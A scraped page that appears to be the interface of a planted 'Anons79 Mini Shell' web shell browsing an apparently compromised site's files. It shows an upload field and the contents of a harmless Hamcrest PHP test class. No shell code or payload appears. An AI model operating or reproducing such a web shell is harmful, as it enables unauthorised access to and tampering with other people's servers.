Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Core/
Upload File :
Current File : //home/proudlyafrican/www/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Core/SampleBaseClass.php

<?php
namespace Hamcrest\Core;

class SampleBaseClass
{

    private $_arg;

    public function __construct($arg)
    {
        $this->_arg = $arg;
    }

    public function __toString()
    {
        return $this->_arg;
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]